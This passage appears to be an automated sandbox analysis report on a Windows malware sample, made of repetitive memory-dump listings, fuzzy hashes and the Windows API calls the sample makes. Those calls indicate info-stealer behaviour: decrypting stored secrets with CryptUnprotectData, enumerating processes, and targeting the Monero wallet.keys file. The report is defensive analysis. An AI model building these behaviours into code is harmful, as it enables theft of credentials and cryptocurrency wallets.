                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: jVcm$u$u-g~$uc9?$vw
                                • API String ID: 0-2623730173
                                • Opcode ID: 2bb9d284822eba911dec9fee820bc5ce32873563d2475d14ec194ca79103a302
                                • Instruction ID: d5fab6000d9f6ba5933cd27268b8e5f3db707c03f1930e0cf130bb1dbfcc4b54
                                • Opcode Fuzzy Hash: 2bb9d284822eba911dec9fee820bc5ce32873563d2475d14ec194ca79103a302
                                • Instruction Fuzzy Hash: 57B2E6F3A086049FE304AE2DEC8577ABBE9EF94720F16493DEAC4C3744E63558058697
                                APIs
                                • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00ECC871
                                • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00ECC87C
                                • lstrcat.KERNEL32(?,00EE0B46), ref: 00ECC943
                                • lstrcat.KERNEL32(?,00EE0B47), ref: 00ECC957
                                • lstrcat.KERNEL32(?,00EE0B4E), ref: 00ECC978
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$BinaryCryptStringlstrlen
                                • String ID:
                                • API String ID: 189259977-0
                                • Opcode ID: 584a729246972c97fe31018e46e02e4d87baff2d967f25a2c5d660065352f10f
                                • Instruction ID: b78bdff9b7f2d190d99034bf5720e9465c489715024aecdf92387834c2c4d70f
                                • Opcode Fuzzy Hash: 584a729246972c97fe31018e46e02e4d87baff2d967f25a2c5d660065352f10f
                                • Instruction Fuzzy Hash: 9C415B75D0420A9BCB24CFA0DD89BEEB7B8BF88304F1041A8E509B7284D7B15A85CF91
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00EC724D
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EC7254
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00EC7281
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00EC72A4
                                • LocalFree.KERNEL32(?), ref: 00EC72AE
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                • String ID:
                                • API String ID: 2609814428-0
                                • Opcode ID: 104becde33b92ff46bd2e1461157b073acdbacd70b8c1ae0d509d0939cf30a8d
                                • Instruction ID: a870b2fb9d94344a8bd4ad763b55ba33c0fd08eeac32382db6215b60140e6f13
                                • Opcode Fuzzy Hash: 104becde33b92ff46bd2e1461157b073acdbacd70b8c1ae0d509d0939cf30a8d
                                • Instruction Fuzzy Hash: 6F0140B5A40308BBEB24DBD4DD46F9D7778AB44701F104059FB15BB2C4D6B0AA418B64
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00ED961E
                                • Process32First.KERNEL32(00EE0ACA,00000128), ref: 00ED9632
                                • Process32Next.KERNEL32(00EE0ACA,00000128), ref: 00ED9647
                                • StrCmpCA.SHLWAPI(?,00000000), ref: 00ED965C
                                • CloseHandle.KERNEL32(00EE0ACA), ref: 00ED967A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                • String ID:
                                • API String ID: 420147892-0
                                • Opcode ID: dd9e875c120224952a632970a2c2371159a89ddbdb523324f242c46eab7f1d87
                                • Instruction ID: a187859cef779ce4215b34ed10d8234d30f617a9450f7a61e81fc4c01ad030d7
                                • Opcode Fuzzy Hash: dd9e875c120224952a632970a2c2371159a89ddbdb523324f242c46eab7f1d87
                                • Instruction Fuzzy Hash: F9012975A00208ABCB25DFA4D848BEDB7F8EF08301F004199A916A7240DB749B81CF50
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ,u]$:NZ$4G?$Qz
                                • API String ID: 0-1775770776
                                • Opcode ID: 437023584354754913465e2da5ba544114211950d3527ca2406bf6fdf5fe429a
                                • Instruction ID: bbc49841cf8de862beec7822e466ce89b9217384f54af1c766cf212c0b1def5f
                                • Opcode Fuzzy Hash: 437023584354754913465e2da5ba544114211950d3527ca2406bf6fdf5fe429a
                                • Instruction Fuzzy Hash: 1AB2F7F3A0C2049FE3046E2DDC8567AFBE9EF94720F1A893DE6C487744EA3558058697
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ! _X$L-vp$ad|=$})z}
                                • API String ID: 0-1120557342
                                • Opcode ID: 6422c6724d45e3c807b5c2ae57f76f8cfabb47e0880055f5ecac14af399c41d8
                                • Instruction ID: c42235fd94b522e635016d6daffad3eeee735d5247e017413b5dc2e379d94ccc
                                • Opcode Fuzzy Hash: 6422c6724d45e3c807b5c2ae57f76f8cfabb47e0880055f5ecac14af399c41d8
                                • Instruction Fuzzy Hash: 68B2F5F260C204AFE304AF29EC8567AF7E9EF94720F16893DE6C583744EA3558448797
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00EE05B7), ref: 00ED86CA
                                • Process32First.KERNEL32(?,00000128), ref: 00ED86DE
                                • Process32Next.KERNEL32(?,00000128), ref: 00ED86F3
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,01B88950,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                • CloseHandle.KERNEL32(?), ref: 00ED8761
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                • String ID:
                                • API String ID: 1066202413-0
                                • Opcode ID: 50e09dcdf99f9911258bf66980351c293388fcd6e84de577f4d2d4a532e42f37
                                • Instruction ID: 3cffa5143db88a72889eb7ee19f1da0149e138b355601ddf7f30c84e44249211
                                • Opcode Fuzzy Hash: 50e09dcdf99f9911258bf66980351c293388fcd6e84de577f4d2d4a532e42f37
                                • Instruction Fuzzy Hash: 70315971901258ABCB29DF51DC55FEEB7B8EF44700F1041AAB50AB2290DB706B86CFA1
                                APIs
                                • CryptBinaryToStringA.CRYPT32(00000000,00EC5184,40000001,00000000,00000000,?,00EC5184), ref: 00ED8EC0
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptString
                                • String ID:
                                • API String ID: 80407269-0
                                • Opcode ID: 7c1cfab1a4227254558c828736f56c21e5f594c6d645e725aecd44a6c75f6cbc
                                • Instruction ID: c34a518d7062d05fc6c5d07a17cd2c98fcc940a1db4679dea9fa724ad670a13d
                                • Opcode Fuzzy Hash: 7c1cfab1a4227254558c828736f56c21e5f594c6d645e725aecd44a6c75f6cbc
                                • Instruction Fuzzy Hash: 7611F874600208BFDB04CF64E984FA633AAEF89304F10A559F9299B340DB75E982DB60
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00EE0E00,00000000,?), ref: 00ED79B0
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ED79B7
                                • GetLocalTime.KERNEL32(?,?,?,?,?,00EE0E00,00000000,?), ref: 00ED79C4
                                • wsprintfA.USER32 ref: 00ED79F3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateLocalProcessTimewsprintf
                                • String ID:
                                • API String ID: 377395780-0
                                • Opcode ID: 113284afd500bdcb37418d92ba939f8a9e4e671030505ee2e18c53b44aa7fa9c
                                • Instruction ID: 9c6430193019e79092253c34bcea7f8e2c5b2638c4ba2fe9fb447bd41a856e93
                                • Opcode Fuzzy Hash: 113284afd500bdcb37418d92ba939f8a9e4e671030505ee2e18c53b44aa7fa9c
                                • Instruction Fuzzy Hash: 2C112AB2944218ABCB14DFD9ED45BBEB7F8FB4CB12F10411AF655A2284E2795940C7B0
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,01B8DC08,00000000,?,00EE0E10,00000000,?,00000000,00000000), ref: 00ED7A63
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ED7A6A
                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,01B8DC08,00000000,?,00EE0E10,00000000,?,00000000,00000000,?), ref: 00ED7A7D
                                • wsprintfA.USER32 ref: 00ED7AB7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                • String ID:
                                • API String ID: 3317088062-0
                                • Opcode ID: 94a84f2ff79129fbe6f4a9e2b7ab1ee46f1ffadb76bb21149a17e70319e63a58
                                • Instruction ID: 8c4dc444db1fcb010948fca9d1e51fbc6a63f995d3acc0e45d4ef4f40a3b51f8
                                • Opcode Fuzzy Hash: 94a84f2ff79129fbe6f4a9e2b7ab1ee46f1ffadb76bb21149a17e70319e63a58
                                • Instruction Fuzzy Hash: A4113CB1E45218EBEB248B54DC49FA9B778FB44721F1042AAE91AA3280D7745A81CB51
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 1$>~$Y':$o8yw$wz
                                • API String ID: 0-1617110467
                                • Opcode ID: b6bd56849ec6d9e0534ddad1816c773cc84302444b67992251224fc7bfd0921f
                                • Instruction ID: caf2bf0b3ed5b086cb1c3b6cfe02d6b5505d5d4b1706b54c26d2508a20827596
                                • Opcode Fuzzy Hash: b6bd56849ec6d9e0534ddad1816c773cc84302444b67992251224fc7bfd0921f
                                • Instruction Fuzzy Hash: 1852F9F36082009FE304AE2DDC4576AF7EAEFD4720F1A492DEAC4D7744EA3598118696
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 4*_d$DfdI$Q(?o
                                • API String ID: 0-882734109
                                • Opcode ID: 6ef4c4bbae00900cb9c28ca82f72e917717a653ce02254d35f561892410bb20c
                                • Instruction ID: 7f81681f43c8393cb4eb87ce6682fcf1b5d4a1c211373e989fb5e90af6259922
                                • Opcode Fuzzy Hash: 6ef4c4bbae00900cb9c28ca82f72e917717a653ce02254d35f561892410bb20c
                                • Instruction Fuzzy Hash: 3BB2F7F360C204AFE704AE2DEC8567ABBE9EF94720F16493DE6C4C7740E67598018796
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
